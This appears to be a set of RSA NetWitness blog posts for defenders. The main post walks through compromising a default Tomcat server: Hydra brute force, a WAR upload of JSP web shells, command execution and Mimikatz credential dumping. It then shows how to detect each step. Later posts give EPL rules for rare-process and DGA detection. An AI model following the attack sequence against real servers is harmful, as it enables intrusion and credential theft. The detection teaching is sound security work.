A web shell is a script that can be uploaded to a web server to enable remote administration of the machine. Infected web servers can be either internet-facing or internal to the network, where the web shell is used to pivot further to internal hosts.

A web shell can be written in any language that the target web server supports. The most commonly observed web shells are written in widely supported languages such as JSP, PHP, and ASP; Perl, Ruby, Python, and Unix shell scripts are also used.

 

Mimikatz

Mimikatz is an open source credential dumping program that is used to obtain account login and password information, normally in the form of a hash or a clear text password from an operating system.

 

THC Hydra

When you need to brute-force a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more.

 

WAR File

In software engineering, a WAR file (Web Application Resource or Web Application Archive) is a file used to distribute a collection of JAR files, JavaServer Pages, Java Servlets, Java classes, XML files, tag libraries, static web pages (HTML and related files) and other resources that together constitute a web application.


 

The Attack

The attacker finds an exposed Apache Tomcat Server for the organisation. This can be achieved in many ways, such as a simple Google search to show default configured Apache Servers:

                                      

The attacker browses to the associated Apache Tomcat server and sees it is running up-to-date software that appears to have been mostly left at its default configuration:

                 

 

The attacker attempts to access the Manager App, which requires a username and password, so the attacker cannot log in to make changes. Typically, however, these servers are set up with weak credentials:

               

 

Based on this assumption, the attacker uses an application called THC Hydra to brute force the Tomcat Manager App using a list of passwords. After a short while, Hydra returns a successful set of credentials:

                


The attacker can now log in to the Manager App using the brute-forced credentials:

               

 

From here, the attacker can upload a WAR (Web application ARchive) file which contains their Web Shells:

                

 

The WAR file is nothing more than a ZIP file with the JSP Web Shells inside. In this case, three Web Shells were uploaded:
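That a WAR is just a ZIP archive is easy to verify. The sketch below builds a minimal admin.war containing a single placeholder JSP; the file names and content are illustrative, not the actual web shells from this post:

```python
import zipfile

# Build a minimal WAR: it is just a ZIP archive containing JSP files.
# File name and content here are illustrative placeholders.
with zipfile.ZipFile("admin.war", "w") as war:
    war.writestr("resetpassword.jsp", "<%-- placeholder JSP --%>")

# Confirm the WAR opens as an ordinary ZIP and list its contents.
assert zipfile.is_zipfile("admin.war")
with zipfile.ZipFile("admin.war") as war:
    print(war.namelist())  # ['resetpassword.jsp']
```

Tomcat simply unpacks the archive into an application named after the file, which is why the upload appears as the admin application in the Manager App.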

                  

 

After the upload, it is possible to see that a new application called admin (named after the WAR file, admin.war) has been created:

              


The attacker has now successfully uploaded three Web Shells onto the server and can begin to use them. One of the Web Shells, named resetpassword.jsp, requires authentication to help protect against direct access by other individuals; this page could also be adapted to confuse analysts when visited:

            

 

The attacker enters the password and can begin browsing the web server's file system and executing commands; typical commands, such as whoami, are often used by attackers:

           

 

The attacker may also choose to see what processes are running, by executing tasklist, to check for any applications that could hinder their progression:

           

 

From the previous command, the attacker notices a lack of anti-virus, so decides to upload Mimikatz via the Web Shell:

          

 

The ZIP file has now been uploaded. This Web Shell also has an UnPack feature to decompress the ZIP file: 

         

 

Now the ZIP file is decompressed:

         

 

The attacker can now use the Shell OnLine functionality within this Web Shell which emulates CMD in order to navigate to the Mimi directory and see their uploaded tools: 

         

 

The attacker can then execute Mimikatz to dump all passwords in memory:

        

 

The attacker now has credentials from the Web Server:

         

 

The attacker could then use these credentials to laterally move onto other machines.

 

The attacker also dropped two other Web Shells, potentially as backups in case some get flagged. Let's access those to see what they look like. This Web Shell is the JSP file called error2.jsp; it has similar characteristics to the resetpassword.jsp Web Shell:

       

 

We can browse the file system and execute commands:

        

 

The final Web Shell uploaded, login.jsp, exhibits odd behavior when accessed:

       

 

It appears to perform a redirect to a default Tomcat page named examples; this appears to be a trick to confuse anyone who browses to that JSP page. Examining the code for this Web Shell, it is possible to see that it performs the redirect if the correct password is not supplied:

     

           <SNIP>

     

 

Passing the password to this Web Shell as a parameter, which is defined at the top of this Web Shell’s code, we get the default response from the Web Shell:

    

 

Further analysis of the code reveals additional parameters that can be passed to make the Web Shell perform certain actions, such as a directory listing:

   

 

This Web Shell is known as Cknife, and interacting with it in this way is neither efficient nor easy, so Cknife comes with a Java-based client to control the Web Shell. We can launch this using the command shown below:

  

 

The client is then displayed which would typically be used:

  

Note:  This web shell is listed in this blog post as it is something the RSA Incident Response team consistently sees in some of the more advanced attacks.

 

The Analysis

Understanding the attack is important, which is why it comes before the analysis section. Understanding how an attacker may operate, and the steps they may take to compromise a Web Server, will significantly increase your ability to detect these types of threats, as well as provide better context during triage.

 

RSA NetWitness Packets

While perusing the network traffic, a large number of 401 authentication errors toward one of the Web Servers was observed; there is also a large variety of what look like randomly generated passwords:

        

 

Focusing on the 401 errors, and browsing other metadata available, we can see the authentication errors are toward the Manager App of Tomcat over port 8080. Also take note of the Client Application being used; this is the default from THC Hydra and has not been altered:

       

 

Removing the 401 errors, and opening the Filename and Directory meta keys, we can see the Web Shells that were being accessed and the tools that were uploaded:

       

 

NOTE: In an actual environment, a large number of directories and filenames would exist. It is up to the analyst to search for filenames of interest that sound out of the norm, reside in suspicious directories, are newly being accessed, or are not accessed as frequently as other pages on the web server. For a more in-depth explanation of hunting using NetWitness Packets, take a look at the hunting guide available here: https://community.rsa.com/docs/DOC-79618

 

The analyst could also use other meta keys to look for suspicious/odd behavior. Inbound HTTP traffic with windows cli admin commands would be worth investigating, as would sessions with only POSTs for POST-based Web Shells, http post no get or http post no get no referer, to give a couple of examples:

     

 

Investigating the sessions with windows cli admin commands yields the following two sessions, you’ll notice one of the sessions is one of the Web Shells, resetpassword.jsp

    

 

Double clicking on the session will reconstruct the packets and display the session in Best Reconstruction view, in this case, web. Here we can see the Web Shell as the browser would have rendered it, this instantly should stand out as something suspicious:

    

 

This HTTP session also contains the error2.jsp Web Shell, from the RSA NetWitness rendering, it is possible to see the returned results that the attacker saw. Again, this should stand out as suspicious:

    

 

Coming back to the investigate view, and this time drilling into the sessions for post no get no referer, we can see one of the other Web Shells, login.jsp:

   

 

Double clicking on one of these sessions shows the results from the Cknife Web Shell, login.jsp:

    

 

As this was not a nicely formatted web based Web Shell, the output is not as attractive, but this still stands out as suspicious traffic: why would a JSP page on a Web Server return a tasklist?

 

Sometimes changing the view can also help to see additional data. Changing the reconstruction to text view shows the HTTP POST sent, this is where you can see the tasklist being executed and the associated response:

   

 

Further perusing the network traffic, it is also possible to see that Mimikatz was executed:

  

This is an example of what the traffic may look like in RSA NetWitness Packets. The analyst would only need to pick up on one of these sessions to know their organization has been compromised. Pro-active threat hunting and looking for anomalies in traffic toward your web servers will significantly reduce the attacker dwell time.

 

The activity observed was only possible due to the communication happening over HTTP. If this had been SSL, the detection via packets would be much more difficult. This is why introducing SSL Decryption/Interception/Offloading is highly recommended. SSL inspection devices are nothing more than a well-designed man-in-the-middle attack that breaks the encryption into two separate encrypted streams. Therefore, they still provide an adequate level of protection to end-users while allowing security analysts and devices to properly monitor and alert when malicious or unwanted activity takes place, such as the web shells shown here. In summary, if you are responsible for protecting your organization’s assets, you should definitely consider the pros and cons of using this technology.

 

 

RSA NetWitness Endpoint

On a daily basis, analysts should be perusing the IIOCs within NWE, paying particular attention to the Level 1 IIOCs. Upon logging into NWE, we can see an interesting Level 1 IIOC has hit, HTTP Daemon Runs Command Shell. This IIOC is looking for an HTTP daemon, such as Tomcat, spawning cmd.exe:

 

      

 

If we double click on the machine name in the Machines window, we can then navigate to the tracking data for this machine to see what actually happened. Here we can see that Tomcat9.exe is spawning cmd.exe and running commands such as whoami and tasklist; this is not normal functionality and should raise concern for the analyst. We can also see the Mimikatz execution and the associated command executed for that:

 

    

 

Another IIOC that would have led us to this behavior is, HTTP Daemon Creates Executable:

 

   

 

Again, coming back into the tracking data, we can see the Tomcat9.exe web daemon writing files. This is noteworthy and something that should be investigated further, although web daemons can perform this activity legitimately. In this instance, the presence of Mimikatz is enough for us to determine this is malicious activity:

  

 

The analyst also has the capability to request files from the endpoint currently under analysis by right-clicking on the machine name, selecting Forensics and then Request File(s):

 

The analyst can specify the files they want to collect for their analysis (NOTE: wildcards can be used for the filenames but not directories). In this case, the analyst wants to look into the Tomcat Access files, and requests that five of them be returned:

 

Once the files have been downloaded, the analyst can save them locally by navigating to the Download tab, right-clicking the files of interest and selecting Save Local Copy:

 

Perusing the access files, the analyst can also see a large number of 401 authentication errors to the Tomcat Web Server which would have been from the THC Hydra brute force:

 

And also evidence of the Web Shells themselves. Some of the commands the attacker executed can be seen in the GET requests; the data in the body of the POSTs, however, does not show in the log file, demonstrating why it is important to have both Packet and Endpoint visibility to understand the interaction with the Web Shell:

 

Conclusion

Understanding the potential areas of compromise within your organisation vastly increases your chances of early detection. This post was designed to show one of those areas of importance for attackers, and how they may go about a compromise, while also showing how that attack may look as captured by the RSA NetWitness Platform. It is also important to understand the benefits of proactively monitoring the RSA NetWitness products for malicious activity; simply waiting for an alert is not enough to capture attacks in their early stages.

 

It is also important for defenders to understand how these types of attacks look within their own environment, allowing them to better understand, and subsequently protect against, them.

 

This is something our RSA Incident Response practice does on a daily basis. If your organization needs help or you're interested to learn more, please contact your account manager.

 

As always, happy hunting!  

After reading through a few SANS resources, I came across some interesting topics regarding the detection of rare processes to help pinpoint malicious applications running on a host; from this, I decided to create an EPL rule to baseline processes on Windows hosts and alert if any processes deviate from the norm.

 

The principle behind this rule is to profile every Windows host in the estate and keep track of the processes which run on said hosts; should a process diverge from the average, it is declared rare and an alert is generated for analysts to investigate. The rule is written in a way that learns what is normal within a specific environment and baselines accordingly.

 

 

Dependencies

The following meta keys need to be indexed for the below rule to work:-

 

  • event_computer
  • process

 

Other than that, deploy the rule and you're good to go!

 

The EPL Rule

@Name('Create Window')
CREATE WINDOW winProcess.win:time(31 days) (theDay int, event_computer string, process string, counter int);

@Name('Insert into Window')
on Event(process IS NOT NULL AND event_computer IS NOT NULL)
merge winProcess
WHERE Event.process = winProcess.process AND Event.event_computer = winProcess.event_computer AND current_timestamp.getDayOfWeek() = winProcess.theDay
when matched
then update set counter = counter + 1
when not matched then INSERT
SELECT current_timestamp.getDayOfWeek() as theDay, event_computer, process, 1 as counter;

@Name('Alert')
@RSAAlert
SELECT * FROM winProcess as original
WHERE counter <= 0.2 * (
SELECT avg(counter) FROM winProcess as recent
WHERE original.theDay = recent.theDay and original.event_computer = recent.event_computer);
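The windowing and threshold logic above can be prototyped in plain Python to sanity-check the rule before deploying it. The 0.2 multiplier and the per-host, per-day grouping mirror the EPL; the event data is illustrative:

```python
from collections import defaultdict

# (day_of_week, computer, process) -> occurrence counter, mirroring the EPL window
counter = defaultdict(int)

def observe(day, computer, process):
    """Equivalent of the EPL merge: increment on match, insert with 1 otherwise."""
    counter[(day, computer, process)] += 1

def rare_processes(day, computer, threshold=0.2):
    """Processes whose count is <= threshold * average count for this host/day."""
    counts = [c for (d, comp, _), c in counter.items()
              if d == day and comp == computer]
    avg = sum(counts) / len(counts)
    return [p for (d, comp, p), c in counter.items()
            if d == day and comp == computer and c <= threshold * avg]

# Illustrative events: explorer.exe is common, evil.exe appears once.
for _ in range(20):
    observe(1, "HOST1", "explorer.exe")
observe(1, "HOST1", "evil.exe")

print(rare_processes(1, "HOST1"))  # ['evil.exe']
```

Here the average counter for HOST1 on day 1 is (20 + 1) / 2 = 10.5, so anything seen 2 or fewer times falls under the 0.2 threshold and is flagged as rare.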

Lee Kirkpatrick

DGA Detection

Posted by Lee Kirkpatrick Employee Feb 1, 2017

In one of my previous posts (Shannon. Have you seen my Entropy?) I touched on using a custom Java entropy calculator within the ESA to calculate entropy values for domains to assist with detecting Domain Generation Algorithms (DGAs); the post was more theory than practical, so I decided to implement and test it in my lab so I could share the implementation with you all.

 

The basic principle behind this form of DGA detection is to calculate an entropy value for each domain seen and store this value in an ESA window. We can then use the values in the ESA window to calculate an average entropy for the domains seen within an environment; this subsequently allows an alert to be generated if any domain's entropy exceeds 1.3x the average.

 

As an example, let's take the following four domains from the Alexa top 100 (this is what we will use as an example baseline; the rule attached to this post would actually monitor your network for what is normal):-

 

  • google.com
  • youtube.com
  • facebook.com
  • baidu.com

 

Running these each through the entropy calculator we receive the following values:-

 

Domain         Entropy
google.com     2.6464393446710157
youtube.com    3.095795255000934
facebook.com   3.0220552088742
baidu.com      3.169925001442312
Average        2.983553702497115

 

Using this average as our baseline, we can then say that anything greater than 1.3x this average (3.87861981324625) should be flagged, as this is a high entropy value.
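The calcEntropy() function referenced in the rule logic is a standard Shannon entropy calculation. A Python equivalent (the Java calculator itself is attached to the original post) reproduces the baseline values above:

```python
import math

def calc_entropy(domain: str) -> float:
    """Shannon entropy, in bits per character, of the domain string."""
    n = len(domain)
    freqs = {c: domain.count(c) / n for c in set(domain)}
    return -sum(p * math.log2(p) for p in freqs.values())

domains = ["google.com", "youtube.com", "facebook.com", "baidu.com"]
entropies = [calc_entropy(d) for d in domains]
average = sum(entropies) / len(entropies)

print(calc_entropy("google.com"))  # ~2.6464, matching the table
print(average * 1.3)               # ~3.8786, the alert threshold
```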

 

Taking the following values from Zeus tracker and calculating their entropy values, we can see the results:-

 

Domain                                       Entropy            Status
circleread-view.com.mocha2003.mochahost.com  3.952216429463629  Alert
cynthialemos1225.ddns.net                    3.952216429463629  Alert
moviepaidinfullsexy.kz                       4.061482186720775  Alert
039b1ee.netsolhost.com                       3.754441845713345  No alert

 

Example of the alert output below:-

 

 

Rule Logic

@Name('Learning Phase Variable')
//Change the learningPhaseMinutes variable to the number of minutes for the rule to learn
CREATE VARIABLE INTEGER learningPhaseMinutes = 1440;

 

@Name('Calculate Learning Phase')
on pattern[Every(timer:at(*, *, *, *, *))] set learningPhaseMinutes = learningPhaseMinutes - 1;

 

@Name('Create Entropy Window')
CREATE WINDOW aliasHostEntropy.win:length(999999).std:unique(entropy) (entropy double);

 

@Name('Insert entropy into Window')
INSERT INTO aliasHostEntropy
SELECT calcEntropy(alias_host) as entropy FROM Event(alias_host IS NOT NULL AND learningPhaseMinutes > 1);

 

@Name('Alert')
@RSAAlert
SELECT *, (SELECT avg(entropy) FROM aliasHostEntropy as Average), (SELECT calcEntropy(alias_host) FROM Event.win:length(1) as Entropy) FROM Event(learningPhaseMinutes <= 1 AND calcEntropy(alias_host) > 1.3* (SELECT avg(entropy) FROM aliasHostEntropy));

 

 

If you are interested in implementing this DGA Detection rule, I wrote up a little guide on how to do so. Everything you need is attached to this post.

 

DISCLAIMER: The information within this blog post is here to show the capabilities of the NetWitness product and avenues of exploration to help thwart the adversary. This content is provided as-is with no RSA direct support, use it at your own risk. Additionally, you should always confirm architecture state before running content that could impact the performance of your NetWitness architecture. 
